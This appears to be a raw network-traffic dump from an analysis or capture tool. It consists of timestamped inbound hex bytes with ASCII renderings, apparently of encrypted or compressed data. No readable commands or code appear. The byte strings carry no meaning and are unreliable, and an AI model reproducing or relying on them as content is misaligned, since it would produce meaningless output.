                                                                              2022-04-26 19:08:56 UTC3467INData Raw: 87 89 30 8a 11 0e 40 f5 4e a2 de 0e bd af 68 2f fd 1a 85 7a 41 22 95 97 bf fa 30 de 76 fe 0f 4f 9b 48 8d 4f 77 66 c3 62 b6 a1 46 da 00 ae ad 3f 63 20 e6 ce 13 ca 72 37 e0 39 cf 73 0c c9 23 bd 8e e5 52 7b 2e da 44 66 e0 13 2f d4 4b d5 0a 25 60 43 81 6e 21 cb ec 0b b9 b7 5f 80 80 75 74 4e 8a 55 6a a4 a0 ac b1 d1 91 46 aa d7 8b 49 23 0f 6e 20 85 b5 65 f8 9f f3 5e fe e7 a4 91 a5 54 ac bb f1 f7 75 ce 90 43 78 a4 27 d7 d0 b9 d7 33 36 84 7f 53 ff e6 ca 0b 57 b1 5b af 82 48 ed 9c c6 ef 46 ec e8 b8 62 a1 d7 52 34 aa 2c 76 14 2c 95 62 20 79 eb ee 15 94 c6 44 14 19 23 3c 96 3d 9e f5 96 b3 b8 dc af b4 39 27 4c a5 e5 cc e8 55 bd 20 c4 1c b5 3f f5 65 a1 5d a0 50 e3 a8 02 d4 ee c7 31 ad 98 e3 58 9a 70 4d 32 84 5c c8 00 bf b0 3f 03 b4 26 93 ae 23 62 87 ad 1d 5f a8 5c 42
                                                                              Data Ascii: 0@Nh/zA"0vOHOwfbF?c r79s#R{.Df/K%`Cn!_utNUjFI#n e^TuCx'36SW[HFbR4,v,b yD#<=9'LU ?e]P1XpM2\?&#b_\B
                                                                              2022-04-26 19:08:56 UTC3483INData Raw: 1c 1a cc 62 9d a6 b6 64 4b 68 2c f5 14 d8 d8 0e 0e 12 77 4b 6d 2d b1 d2 49 e4 59 8f 3c b3 ff b4 50 42 bb c6 61 6d f2 ff e1 f0 66 dd c4 7c d9 e0 74 e3 42 78 48 75 b8 0d ac 66 98 c1 52 b4 7e 0c fe 3c 9e 47 0f 5e 5f 7f 23 b6 63 e6 c2 89 e8 92 ad b4 79 3c b1 d1 32 0f a4 02 04 c5 fc 14 ab 41 b9 93 6d 79 ea f3 36 6a bc 94 f3 df 31 35 d7 df 8d 61 f6 ee 1a 7f 5b 57 6e 51 c7 60 94 5a 9a 2c 91 d6 3f c8 54 e1 fd 26 85 c5 2b 06 b1 a0 1d 28 f6 17 de 1d a8 36 6a 2f 6f 28 76 74 5f e2 e4 2e 4e 1b d8 af 8b d0 e9 33 bf a7 ed 78 fa bb 57 10 db 5d f6 e3 48 8c 71 3c 68 c8 45 e7 78 bf 79 55 77 8b 75 76 19 ac 7d 26 d9 f5 c6 bf b3 cd d6 7c 89 a6 d9 cf 5e f1 41 c4 b2 d6 4d f2 52 bd ca 77 aa 31 e5 ed 45 b8 30 56 a3 7a 2e 7c 2e 8e 48 81 c4 07 db 0c 8d 17 31 4f 74 53 09 34 79 63 2b
                                                                              Data Ascii: bdKh,wKm-IY<PBamf|tBxHufR~<G^_#cy<2Amy6j15a[WnQ`Z,?T&+(6j/o(vt_.N3xW]Hq<hExyUwuv}&|^AMRw1E0Vz.|.H1OtS4yc+
                                                                              2022-04-26 19:08:56 UTC3499INData Raw: af 28 6c 82 b0 df a0 fe 30 d5 f4 03 e2 26 fb 07 11 ca 22 a7 11 c0 2d 5f 5e 36 d6 d2 c3 ca 41 9f 2b fb 79 e3 e3 89 e2 9e 90 74 ba 7d 7e 6a 8d 35 71 d8 2f 79 d4 a8 fc 06 6f b8 99 2d 1e 63 39 a6 49 c9 d7 fe eb 32 40 9a e2 39 27 0c 25 20 54 03 7d 00 f2 7c 20 18 80 7f e2 4e f0 25 86 e6 ad 3c bb 63 70 75 ed 2f 6a 6c 88 12 23 31 70 f5 94 a0 7e 33 8b 97 8d 57 65 21 1c f4 cf ac e8 a5 9f f8 e8 13 a3 bb b3 66 c1 06 04 28 6a 49 ff f7 2f 9c cd 5d c4 2c 8f 9f f6 38 f8 dc 31 f7 63 df d0 2d a4 db 5f c7 c5 4c 12 aa ed 32 27 40 26 30 5b a4 5c 1e c8 24 ae 5d 3e 25 4e 3b 89 76 78 ca f7 f7 a5 e5 87 08 58 80 56 38 06 bd 6b 9d 86 e6 89 4f 85 c1 b0 33 04 e8 80 5a 1f 2e 74 50 02 9c 74 79 2d 76 c0 b3 b2 0c 57 d3 70 0e 33 de 31 82 51 c8 f1 d6 5c ec e1 b9 0b 90 0f 06 af b7 1c 06 9e
                                                                              Data Ascii: (l0&"-_^6A+yt}~j5q/yo-c9I2@9'% T}| N%<cpu/jl#1p~3We!f(jI/],81c-_L2'@&0[\$]>%N;vxXV8kO3Z.tPty-vWp31Q\
                                                                              2022-04-26 19:08:56 UTC3515INData Raw: ad 7d d1 fa 7b a8 4b c5 29 bf 5d 32 0d af 57 64 4a fd 38 93 4e b0 83 94 8f 08 c2 74 01 cf 70 a8 79 c1 f5 70 6c bb 88 61 9b 5f 0c 27 d4 97 2c 28 4e 9f ce ce 83 03 1e 4c ea 7b 10 6f 30 8d 8b 8a 4c 5d 78 e4 f6 f8 28 5f e8 cc 9f 26 d6 7e bf aa 8e 21 f7 7c 8b b2 3d 24 34 bd fc d9 dc ee 49 31 a4 00 6d 62 3a 0b ba 55 6d fd 22 00 98 f1 bf 12 fa e3 9f a7 27 7f f8 05 7b f2 06 54 19 1e 99 2d 79 db 36 53 4c 78 7d 31 b2 aa 45 02 1e d5 66 ee d7 4c 21 84 ac 75 b8 83 f0 9b a0 15 31 8b b0 73 d9 0f 18 eb bc 1e aa 6d 00 59 ec 52 d0 2b d7 86 5b f2 3c 9e 1c bd 95 6a 31 ad da da 5f 1e da 21 34 a9 cf ae f6 34 0a 64 e6 33 01 0f f8 fb d4 b1 d2 10 35 d8 3d 36 46 f1 91 13 7f 9b 3a 15 ab f9 93 b0 68 29 55 29 fb 67 21 d6 11 dc 64 9d 23 86 2c 64 2d b5 65 ec a4 7a f8 df 46 d6 1f 7a 45
                                                                              Data Ascii: }{K)]2WdJ8Ntpypla_',(NL{o0L]x(_&~!|=$4I1mb:Um"'{T-y6SLx}1EfL!u1smYR+[<j1_!44d35=6F:h)U)g!d#,d-ezFzE
                                                                              2022-04-26 19:08:56 UTC3531INData Raw: ae 74 1c 5d 87 bd 4f 73 51 ac 4e 3d 8f 02 e8 6c 1a f0 90 3b f8 ae 40 ea ec bf 8e 3a 1e 01 05 5e 1a 7e b2 b8 38 6d 43 dc e4 0f d8 b2 30 f6 06 a8 e0 96 bf 2d 0c 19 82 8f 32 da d8 e2 35 3c c9 16 38 a9 7c 75 a4 1c 6c a6 b8 0f 47 3f 56 63 78 e6 5b a3 ab f8 03 30 a0 14 97 e4 2f d9 ec 26 c6 3e f1 00 2a 00 aa 9e 01 d2 8c c6 3e 23 b4 2b 54 ca 9e 26 e9 77 fa 46 32 d5 4d 54 48 ea eb 3c 91 99 df ef f7 60 e0 9b c4 eb 64 12 53 eb f3 49 fc 48 da c6 de f2 89 9d 5a e1 bb 3c 6f 21 49 ba 76 6b ca 9a 76 ae 11 dc 0c 79 9e cf 0d 3d 1c 5b ed 8f 68 61 34 eb e5 17 ce 57 a6 3d 7a 0a c7 ec de 14 f5 ca 61 c7 0e 8a a0 84 98 b5 25 e5 36 b3 59 eb 25 30 e8 06 15 30 aa b6 17 64 30 55 50 aa 0f 8b e8 f5 33 ee 0d 38 9f 2b 09 67 76 53 0c 22 92 88 6c dd e4 71 1a 75 53 08 36 20 20 21 da 2d c3
                                                                              Data Ascii: t]OsQN=l;@:^~8mC0-25<8|ulG?Vcx[0/&>*>#+T&wF2MTH<`dSIHZ<o!Ivkvy=[ha4W=za%6Y%00d0UP38+gvS"lquS6 !-
                                                                              2022-04-26 19:08:56 UTC3547INData Raw: 41 28 a8 17 35 39 93 b5 17 16 f3 01 9d 89 63 ab 59 98 b6 f8 e9 b4 91 f8 3a 0f fa 60 d6 2f 09 78 e9 4a 15 38 f8 d3 ea b8 1f 83 5a 03 47 66 e8 71 5d 0a 69 85 c9 aa 53 8a 90 61 9c bd d5 b1 40 0b 45 e7 ff e5 f0 bd 2e e0 ef 53 75 67 b4 aa 15 0e 97 d5 63 09 18 73 de 83 44 35 0a 34 9e ad d2 cc 49 69 ea 49 28 7f 49 95 94 83 b5 0a f3 6b 56 3d 59 84 13 e7 22 ac 6e 6c 91 9f 28 e4 c5 be 81 62 de 9e f0 85 ca e8 4b af 0b ac 6a d8 95 2d e6 4f c2 e2 c8 76 e2 b2 33 81 b9 9d 84 e2 b9 7a 77 7c 59 ad 75 69 58 ae 2c bf c7 99 17 b1 c3 a2 6e 0f 62 4d 63 68 7f a0 ab df 70 d3 ff 90 e9 1e 1e be 19 e2 cf 4c 0f 93 1f e2 a9 aa 4e 35 2d 51 2a e7 12 c0 a2 e0 7b 6f ab 23 4e ab 9f 16 d2 29 ac 14 f0 60 77 d1 5a 22 b4 67 34 dc 5c 35 47 78 aa cc b3 aa 26 ca 0a 92 da ba 94 e5 db 7d 37 70 bc
                                                                              Data Ascii: A(59cY:`/xJ8ZGfq]iSa@E.SugcsD54IiI(IkV=Y"nl(bKj-Ov3zw|YuiX,nbMchpLN5-Q*{o#N)`wZ"g4\5Gx&}7p
                                                                              2022-04-26 19:08:56 UTC3563INData Raw: e7 2a 93 4c c3 e9 e8 ca 3c da e2 7e 42 e6 2e 54 35 02 44 de 6f 21 11 50 0a d6 ad 05 bf a3 42 23 e0 67 9a 05 52 03 cb da fd 07 49 c0 38 11 92 13 e8 0d 4a f2 19 a1 da da 4f f7 5f 1d 34 1a a8 31 4c ce 1e 68 e6 b0 3f 05 02 de ba 7a 63 ca 34 2b 0f 8b 1f 0a b0 93 da 37 34 d2 dc fe aa 4a 94 dd 8a e7 2c f3 9a 95 de ad ec d9 7c 79 13 5a 66 d5 3f ea d9 b0 70 3e b1 88 f7 23 a1 ac e1 c6 d4 15 59 76 ce 94 cc 64 53 bf cc 2e 03 c5 15 c9 d8 5f 71 c1 91 ab 39 86 90 01 c4 b5 18 09 28 3f 19 b5 be 49 c9 9b 52 35 d7 21 46 51 9d 8e 73 cd 74 58 fc 94 f2 fa 38 97 42 59 f1 c1 1e fb 34 64 cb 70 66 dd 2f 3c 9f 22 95 75 0b db 81 4e 9f f6 f1 98 ef 5d 39 f7 c4 73 f6 4d 0a 94 9e 97 90 3b e6 d5 de 12 bf 2c 31 07 31 15 8e 58 ab e6 73 b1 b4 a4 36 c1 c3 98 99 65 61 c1 18 ec 64 47 60 1b 31
                                                                              Data Ascii: *L<~B.T5Do!PB#gRI8JO_41Lh?zc4+74J,|yZf?p>#YvdS._q9(?IR5!FQstX8BY4dpf/<"uN]9sM;,11Xs6eadG`1
                                                                              2022-04-26 19:08:56 UTC3579INData Raw: 6f 88 7f 47 27 fb 48 55 2d cf 7a a7 f6 e4 6c a8 42 56 51 36 76 47 f9 68 41 f5 61 24 13 d8 02 90 a4 99 31 dd eb b3 c1 72 5b aa 54 28 8c c9 e4 a5 3a b7 4f f5 f9 7e be 79 1c 5e 62 d9 9d f7 27 c3 e6 8e 91 ed ff 05 3c 9f 49 c8 84 4b 8c f1 be 02 42 a3 e1 41 01 c5 7f 2c 05 5d 5a e2 4c 00 4d 64 60 21 d6 78 0f d7 3b 82 03 51 45 fd 2d 47 99 eb c9 70 94 48 11 bc 37 d5 57 a3 4b 30 6c a2 24 0c 49 4a 1b 20 69 c4 6d 09 40 a7 5c 85 f2 02 69 84 98 e4 9c 7a ac 1a e0 5e 72 c3 5c 52 6e dd 6a 52 e8 88 9d d5 4f 24 f9 1d 00 f6 f2 a0 bb 10 58 ae 51 01 cb fe b2 a8 9a b4 fb a9 0c 05 60 1d e6 03 32 49 29 cc 7a 86 aa 92 c3 7b a0 77 4d 24 22 25 7a 05 37 34 82 7b ab c2 94 8e dd 25 fb be 52 79 1c b2 f7 d4 66 15 30 4c f2 23 36 83 c7 e6 fc f5 e4 ab 49 ad 62 d0 34 cd 2b 55 3d 02 2e b6 66
                                                                              Data Ascii: oG'HU-zlBVQ6vGhAa$1r[T(:O~y^b'<IKBA,]ZLMd`!x;QE-GpH7WK0l$IJ im@\iz^r\RnjRO$XQ`2I)z{wM$"%z74{%Ryf0L#6Ib4+U=.f
                                                                              2022-04-26 19:08:56 UTC3595INData Raw: dc 90 80 df 7b fe 74 47 a3 b1 cf 0a b4 14 80 e5 a0 82 9a d7 cc 6a 9b 60 c0 75 ed 27 63 bf 48 60 c0 f2 4a 63 18 5b 5e 1d a0 7a aa 0f f1 72 4d ad 3f 0f c9 70 86 d6 8e 12 02 c8 6c 07 44 d5 fc ad 21 1a 3e 29 eb 1c 57 3d b7 43 3b f1 62 05 6f 67 d9 1d 0f ac b8 16 55 6f 50 04 3b 4c 7b 69 4b 08 0a 05 81 e3 d9 83 a6 08 96 51 20 cd c0 a6 bc 35 dd 07 26 95 fc 40 cb ac a1 f9 fe 28 96 a9 4d 8b d8 ae e9 15 04 73 48 4e f3 ae 4f 8c 30 a1 8a bd ce 04 db 30 d7 e1 d5 ff eb ee 44 62 a9 68 53 a4 7f 76 03 0e d6 6f db 9d 27 d0 f4 47 ab 25 42 96 5e 1f 2e e4 2d 65 95 43 55 54 24 1b 4c cf d5 ba af 29 a5 34 e3 2a f8 1d 9e 32 bb 6f 04 5a 25 26 c8 47 d0 e1 02 90 76 ef 8d ba 40 fa 19 5e 0b bb b1 56 a0 01 d7 e7 f1 59 94 f6 ec 64 62 bd cf 37 5a 4b fb ae 74 c1 4a 6c 50 85 7f b8 f3 5f 85
                                                                              Data Ascii: {tGj`u'cH`Jc[^zrM?plD!>)W=C;bogUoP;L{iKQ 5&@(MsHNO00DbhSvo'G%B^.-eCUT$L)4*2oZ%&Gv@^VYdb7ZKtJlP_
                                                                              2022-04-26 19:08:56 UTC3611INData Raw: 11 a0 d1 2a 97 70 6e f5 32 87 c5 69 94 85 7a ec 66 63 93 e9 cd fb d5 02 e8 5f 72 4a 28 3b ca e6 dd 7b 9f 63 50 76 7e 59 08 f5 67 42 48 eb 9d 36 ea a4 90 42 2c 8d 9a b8 a8 b2 37 2c 27 3b c6 3b 60 9e 11 af 13 95 21 82 2f 33 f2 f8 5f 70 50 e2 f9 0a 8c 0a 51 58 43 9c 48 83 45 dc 12 d2 be bc 57 68 11 bc 42 68 e4 e0 75 d9 22 ef 31 63 51 59 f6 bb 98 f5 dc 74 14 d6 ec ac c2 a2 e9 72 40 74 a8 fb 10 55 f9 fb c0 09 14 d6 96 8b ac 79 cc 30 66 03 c7 18 66 43 ca 6f e2 96 02 12 bf ca c7 40 9f 52 18 cc f8 39 31 ae 4a 3e d2 ce ee 3a 5c 91 b1 f9 71 ce 5d 2a 7f 5b c9 e7 27 c8 64 39 7f 57 4f d4 93 0d 5c f9 62 96 fc a6 65 30 24 7c 96 e4 61 d2 96 7e 36 6a b5 03 62 63 74 fe 28 06 f9 33 dc 03 42 4a 19 c4 ca 94 55 3d fc e0 2d 0b 22 b5 47 36 91 65 38 9c 49 d3 ba 6f 0e f4 2e 41 1b
                                                                              Data Ascii: *pn2izfc_rJ(;{cPv~YgBH6B,7,';;`!/3_pPQXCHEWhBhu"1cQYtr@tUy0ffCo@R91J>:\q]*['d9WO\be0$|a~6jbct(3BJU=-"G6e8Io.A
                                                                              2022-04-26 19:08:56 UTC3627INData Raw: 37 83 b2 f1 0c 14 2e 4c b9 bd d2 53 2a 72 77 62 ea 81 80 1c 74 67 50 3c ff 5f 4c dc dc ba 3a 50 18 02 0f e8 a1 91 ed 42 6e 52 87 26 1c a4 43 94 48 1d 5b 7a 6b 0c ed d7 b6 9f e1 6a af 44 99 4a b6 0e be 00 21 e6 fb 72 45 6f c2 d1 b8 f2 a4 6c f9 3b 39 3d 1d cc 95 bb aa 28 98 a4 8a c1 3d 36 90 22 ca 1c 73 7a ea 7b 34 f7 d7 54 3b e6 f0 ec 83 44 cb 91 dd f7 8c b9 27 a4 8a 77 1e 67 83 4d 76 28 64 52 d3 de 47 7f 01 1a f4 fd 28 d7 f1 20 7a eb 89 ed 0d 57 60 82 26 66 84 55 3d 3d 26 46 d9 42 3a cb a6 26 f8 b6 c6 b2 6c 33 12 c9 f4 1f 5e fe 1b 17 0d 3e b4 f2 d2 c1 b2 1c 76 de 67 3f 08 6b 0f a3 63 a9 c9 c9 fe c2 70 6e 00 ff 60 e9 24 df e0 95 9e 65 8c 1f a4 c3 46 be 7c 1a be 5e 69 5b a1 fc 15 bc 0c 11 25 fb 92 07 5e a0 7e 6e 07 44 2a 06 c0 a6 a3 6e a5 86 65 91 2c 05 0c
                                                                              Data Ascii: 7.LS*rwbtgP<_L:PBnR&CH[zkjDJ!rEol;9=(=6"sz{4T;D'wgMv(dRG( zW`&fU==&FB:&l3^>vg?kcpn`$eF|^i[%^~nD*ne,
                                                                              2022-04-26 19:08:56 UTC3643INData Raw: 54 37 3b 03 55 3b 8f 04 2f 2f b7 c1 a7 37 96 bf 0d d1 11 38 66 e6 e0 b1 b7 11 c9 6b a5 4e 68 bb d1 ce d7 3e cf 47 f8 89 45 51 e1 b7 48 cb ce e0 0a e7 d9 e0 66 e1 30 61 85 8b 2b ce da bb c9 02 6a d5 9c 0d 0e 67 b6 99 41 81 ed 04 ca c1 50 00 01 c9 96 5d 10 d2 f1 51 46 a4 d3 2a 9c 55 77 b1 a5 aa 7d 09 fa 4f b7 87 4a 0c 6c 90 48 37 c7 d1 96 22 d9 b4 29 8f f8 6f 27 94 02 08 65 eb 2a 01 8e 97 96 fa 77 81 77 8c a2 0d c0 6d ae 99 10 8c d9 71 aa 1a 86 b0 b7 8f 7d 0f 4a 8f cd 08 25 96 4e 74 b6 b9 fa 43 3d 32 53 ef 93 eb 9e 09 0c 8d 67 39 bf 67 22 7a 27 e7 db fe 0f 60 d2 c6 14 ec 40 df 3a 23 7c d0 c4 a7 4c 15 ab 08 db 53 89 c2 25 5e 0e 62 5d 3e 27 a1 a9 1a 5d 21 2a 76 6a cc c5 7d f9 f9 b9 11 40 c9 fc 38 20 b3 2b 78 30 36 de cb 79 a6 5a 84 8f 5f b5 72 3b e9 30 3a 6d
                                                                              Data Ascii: T7;U;//78fkNh>GEQHf0a+jgAP]QF*Uw}OJlH7")o'e*wwmq}J%NtC=2Sg9g"z'`@:#|LS%^b]>']!*vj}@8 +x06yZ_r;0:m
                                                                              2022-04-26 19:08:56 UTC3659INData Raw: 3e bc dc 5b 0e 60 4a 48 f0 a7 0d 1c af 78 00 a0 29 bb 2d 7a d9 e3 10 62 83 bb 64 e3 ea 6a a7 b3 de e2 7a 85 54 b7 b2 b0 ac e7 e6 37 b1 8a e7 e4 f6 9f bb ac cf cf 71 23 3e 75 25 a3 88 12 09 ea b8 1b 54 62 24 51 7b 92 71 15 19 ce df da aa fe 73 d6 58 5b 10 f2 31 48 32 88 56 4e 94 c0 e9 cb b5 c3 af 42 c2 2b c9 17 eb 05 2b e2 9a 3b c2 b1 e5 e0 cd 38 18 b6 36 92 27 72 0c 80 ff dc d7 8c 00 b0 c9 6d e3 66 f0 c7 83 34 bb 2b ab 37 ea 0d 95 a0 46 79 6d e0 f0 d0 71 8e db ac 83 04 3e e5 bd 06 62 ab ec 88 3e 9b 55 9b 83 83 cd eb 3f 03 b7 bd d3 f6 48 b4 81 6a 22 cf 86 40 01 6a dc cc 32 e2 bd e3 fc f0 dc 37 cb d4 eb f6 95 7f 5a 7f a4 dd d2 8e 4d 4d 5a e8 b1 f2 e0 ef cc a7 cb 98 61 22 42 c0 0e a7 01 af 46 c8 8c ca db 1f b9 83 f5 c4 b9 bb ba d5 b7 1f b8 07 27 d1 57 5d 12
                                                                              Data Ascii: >[`JHx)-zbdjzT7q#>u%Tb$Q{qsX[1H2VNB++;86'rmf4+7Fymq>b>U?Hj"@j27ZMMZa"BF'W]
                                                                              2022-04-26 19:08:56 UTC3675INData Raw: d0 a1 67 d7 eb 8e 1f 33 98 a6 25 9c cb 92 7a 84 dc 5d 12 f1 6d 74 9a db 69 a4 ba 06 1d b6 95 5f 3c 17 e0 47 88 cd e0 70 4f 08 30 9e 41 84 16 05 53 70 7b 42 c3 ef b4 02 2e d6 2e 9d 7d fa 43 d8 0e 58 1d 8e 44 41 eb 7d 47 b8 02 37 7c 84 fa 85 16 01 95 27 df 67 84 56 22 fd 3b df 2c 60 78 16 8d f0 f7 65 b7 db 8d f4 0b ab f5 1e 2e be 24 dd 8e 8a 52 32 d7 3d 1e f7 b6 4b b7 47 cc 4d 48 06 dd af 5b e7 7c 55 c7 3f e6 da 66 c2 78 60 61 09 cc 31 af 95 78 dc 85 fe 95 54 d3 20 08 e9 b9 f6 6e 2f 7a 9a 0e 74 f9 15 5c 69 e3 ab 47 9a 41 3a a3 c5 9b d3 d4 26 38 83 9c b9 26 8e fb f4 ad 8d ae 43 6b 48 8b df 5d d1 4a a2 a9 e6 f8 a3 d4 ef 92 76 97 b1 20 ab fe 44 17 0d 9b f9 49 7a f8 5a f8 a0 23 8d a2 db d8 1c 3a ff 0d 0c 65 33 2c 36 2a f1 bc 2a c1 f1 4c 29 22 84 4c 15 77 1c db
                                                                              Data Ascii: g3%z]mti_<GpO0ASp{B..}CXDA}G7|'gV";,`xe.$R2=KGMH[|U?fx`a1xT n/zt\iGA:&8&CkH]Jv DIzZ#:e3,6**L)"Lw
                                                                              2022-04-26 19:08:56 UTC3691INData Raw: 17 c1 2d 77 3a ec 3b 08 8d 07 46 1f 55 06 06 34 5c 0d f1 7b d7 97 c9 50 4c f1 48 a0 bd e5 ea b0 93 d6 e7 57 44 7b e3 07 4f 16 21 30 d5 fa e4 e8 c0 bb 01 e8 6f 28 b5 1e 6b 47 e8 93 aa ca 91 c7 3a 8f 9a 57 f6 1b f3 b0 7d f4 62 a2 86 2b 55 bc 52 9a 4f 8c f1 54 45 b8 85 11 9b c2 a2 7c e3 c6 02 96 2a 0e ce 35 8b 1a cb 5b 19 36 c3 71 83 bc 17 cc 7b 06 bc 21 c6 f0 a0 2a d9 87 b6 1a 73 87 66 7a 85 e1 1b 69 13 c6 e5 33 1b f6 69 fa e4 3b 00 2c a1 c2 ef 98 53 14 8c dd 0e 66 4b cb d4 d0 9e 66 71 c4 1e 14 10 0d 67 19 6e a2 e3 32 9c a4 a0 58 c3 c3 70 6a 89 01 0a e0 19 2f ec 74 1b fe 53 99 03 57 15 de 49 b4 52 81 17 a2 9f b5 ac 35 dc 5b ee d2 19 9e bb 02 da 9f 22 d4 3f e7 f7 95 ac ee 5e 18 75 c0 74 6e b1 c5 fb cb 98 de 57 84 8a 9a 73 1f b8 da 9d ca 59 0f fb 07 9b 05 eb
                                                                              Data Ascii: -w:;FU4\{PLHWD{O!0o(kG:W}b+UROTE|*5[6q{!*sfzi3i;,SfKfqgn2Xpj/tSWIR5["?^utnWsY
                                                                              2022-04-26 19:08:56 UTC3707INData Raw: 46 53 39 cf 63 a9 75 47 72 d8 77 4a 64 0b 36 03 eb 5d 5b 47 49 5c 21 95 19 f6 25 1a 0f 69 67 04 ea 78 ca 70 82 32 80 bd 92 c9 b7 fe c3 bc e8 43 42 54 82 ee 39 30 4e 5d 39 65 66 ee 4c 93 be 85 75 32 2a 47 73 c3 9f 7d 2e 5d a1 51 ca ea 63 0c c0 d6 3d 23 fc a4 9b 10 22 2d 0d 6d 82 76 85 17 37 da aa 04 d9 7b e5 d2 23 11 fd ab a5 6b 22 1d ec 6a 74 e6 fe 20 13 e2 9c cd e5 60 13 3d a1 eb ab b0 9b bd 94 7f 94 80 2f aa 12 7d a4 ef 55 8f b7 ea ba dc 56 15 35 fd a8 66 c1 f3 5b 89 10 5a 82 d9 56 cc be 73 a3 72 f8 5d fc 8d 12 53 e2 b3 cd 6b ce e8 65 9c b9 8f e3 cc e8 b8 33 82 b5 1a 69 4c 00 45 c7 69 1e ed 0b c9 02 3b 21 8a 62 59 0a 2b 85 43 e4 70 8a 6f 57 4d d8 70 07 84 4f 22 2f 70 06 d9 e5 6d 26 9c 3f 01 1d c1 90 85 bd 84 f0 19 19 cd 85 b1 77 18 73 93 89 50 86 75 2d
                                                                              Data Ascii: FS9cuGrwJd6][GI\!%igxp2CBT90N]9efLu2*Gs}.]Qc=#"-mv7{#k"jt `=/}UV5f[ZVsr]Ske3iLEi;!bY+CpoWMpO"/pm&?wsPu-
                                                                              2022-04-26 19:08:56 UTC3711INData Raw: 00 bd 72 be 53 0e 69 48 89 0c 83 c3 01 31 89 cf 26 a7 b6 c6 7b 4b ad ee 63 52 1b 23 8e 4f 12 ef 86 6c f5 5d d7 4e ff 3b 78 96 d4 2a 47 5f e1 88 8d 62 c0 92 a6 1a 74 d5 5a a9 f4 67 30 a8 e4 25 c6 2d 8e 76 c9 48 92 53 54 c2 b0 26 15 88 d5 cd 1b cd a2 38 19 6e e4 b6 38 67 24 92 3b 16 29 c9 f7 2d 1c c3 bf b6 dd d3 4a e4 9b 7a 63 c5 df ad 93 7a 00 1f be 48 7e ea 65 d8 cc d8 11 c6 61 48 cd e9 b0 37 15 92 fd 12 d9 6b c3 30 20 ac a1 bd f5 da b0 ac 78 6a 60 30 a2 77 2f ac cd 2f 47 c0 a6 ea 8b 0a dc ca ec 31 8d 0a fa fc b4 ab c0 54 cb 11 9d 02 40 81 e5 b5 06 7f aa 33 f9 cc af 3f 3f 24 a9 50 b6 67 23 fa 93 53 b7 d2 0d b6 bc 5f c6 bf 4c 4d 9a a4 e2 89 ce 00 02 0a 8e 37 d6 a0 cf c3 e8 78 79 9c a8 1d ed d7 92 00 63 cb 3b f2 e3 55 cb 0e 04 df b0 be f5 32 9f c2 46 9a 53
                                                                              Data Ascii: rSiH1&{KcR#Ol]N;x*G_btZg0%-vHST&8n8g$;)-JzczH~eaH7k0 xj`0w//G1T@3??$Pg#S_LM7xyc;U2FS
                                                                              2022-04-26 19:08:56 UTC3727INData Raw: 5f 79 41 0c 76 38 15 36 f3 d4 0b 67 db 5d 0f 18 dd d3 f9 84 7e ee 56 ad ce 23 6a fc 15 a7 c8 53 c5 dc f0 07 31 62 9c a7 07 6a b0 c8 27 e3 7d 9c 8e 31 ba 82 b3 f1 91 9f 4b f3 14 cc 18 17 89 23 fc 49 d7 b4 1e c8 1a d2 38 95 48 8f 1b c4 45 41 0a 1c dd 1d 51 dd ae 01 e4 8d f1 3b d4 fa b7 8a 6e ca 1a 03 79 1b 07 f0 8b ff 93 a0 dd 3e 01 d0 68 2f 42 11 5e 54 ea 72 3a 61 bd c2 88 93 9a b0 ae 20 7b 1c b5 bf 04 77 69 ba 05 d0 ca 07 49 c8 bd a4 78 9a 61 30 b6 48 7f 04 31 30 2b fa 71 4c 4f 51 a7 68 b9 f9 f6 da c6 2f 01 06 50 4d 6d 8c 50 f8 9a ac 8a 6b f2 ad 1a 89 e8 f4 e7 db dc fa 2c 17 7b 37 9e 2f 93 4c 97 f4 e1 1d a4 e8 d4 0f 0d b8 c1 1e bb bb 6f ea bd e1 f6 0f 36 61 4b e9 aa bd 40 18 4f 6c 16 61 77 9f 63 88 ef 2b f3 52 ab 21 4b e8 07 0e 7a 1b 88 cf fa 2e 2a ed 0e
                                                                              Data Ascii: _yAv86g]~V#jS1bj'}1K#I8HEAQ;ny>h/B^Tr:a {wiIxa0H10+qLOQh/PMmPk,{7/Lo6aK@Olawc+R!Kz.*
                                                                              2022-04-26 19:08:56 UTC3743INData Raw: 3d f0 8f 84 12 a4 ac 6e 45 5e ee bc 74 06 9e 2f d2 df 35 39 7f ca 55 36 12 66 d8 8b 12 b4 4e 00 b8 2e e8 3f 62 bf 42 c1 a7 a4 6d be c4 1a c1 ad 95 5e 42 89 ec 11 86 db 61 33 63 e0 df 25 ff b9 5a a9 13 f1 44 db 7d 1a ed a4 a4 0a 42 3c ef d9 dd 85 67 2b 6a 83 58 4f fc 00 65 67 7a 9c 74 5c a2 b7 79 4e 92 18 20 d6 27 0b 6c 4d 44 ab ae fd af 55 88 2d 59 49 e8 77 77 92 41 9d 23 70 0e cc a1 d1 d5 e4 12 d1 79 58 9d cb c8 70 a8 2f 1e 77 ca c8 37 63 78 b7 f1 42 d6 c5 cd b6 37 80 6d 91 66 e3 96 1b e8 34 8e c0 68 c2 40 12 f7 e1 6f 6d 75 be 17 8e 12 8c b4 77 9a b2 d0 b1 50 8e 8a b1 81 95 76 bd 0e 55 97 d3 02 4b 68 85 48 77 86 b4 88 c0 1f 5f af 47 07 96 7c af 12 f9 0e 84 bf db 63 cc 84 98 a0 97 9a c3 4a c8 39 9a be 83 db 13 cf ac e9 df 08 8e 12 f3 e2 31 09 fe 0e 0c 5b
                                                                              Data Ascii: =nE^t/59U6fN.?bBm^Ba3c%ZD}B<g+jXOegzt\yN 'lMDU-YIwwA#pyXp/w7cxB7mf4h@omuwPvUKhHw_G|cJ91[
                                                                              2022-04-26 19:08:56 UTC3759INData Raw: fe 68 09 ca d4 1e 94 d1 71 cb fd a0 d6 b6 1d 09 95 e0 27 fb 29 a0 09 75 86 bb 29 27 15 6b 2a 81 e2 ea 37 c4 8e 2f 47 46 6f 81 cc 62 62 59 43 38 19 14 ca 0b 04 29 a3 10 ce 52 bb 9c e0 8a 4b 8e 9e 0a 7b 4c 6e f1 22 21 2b 99 21 c2 63 69 e3 a1 1e 4c 67 c3 fb 75 9b 33 d5 43 49 38 dc 8f 80 c0 d8 f7 ce 72 16 ac b9 6a be 12 51 fe 9c 0d 18 da 78 e6 9e 5f 97 cc 7e 00 f1 8d 6e 07 46 7b ad 8b 07 c3 82 7c ea 87 a9 f6 c3 0a 5c 90 78 b8 31 d0 6b 1e db ed 8c eb da a4 4f 74 b2 17 8a 7e bd 6f c6 85 68 f4 05 bc 73 6b 4c c5 29 62 db b6 8b cb 7b d5 af b8 05 44 5e 84 8d b0 0d 3d 09 af ba e3 91 96 59 b4 71 ec b1 c4 ed fa 3b 2f 13 33 db 7d 4c 80 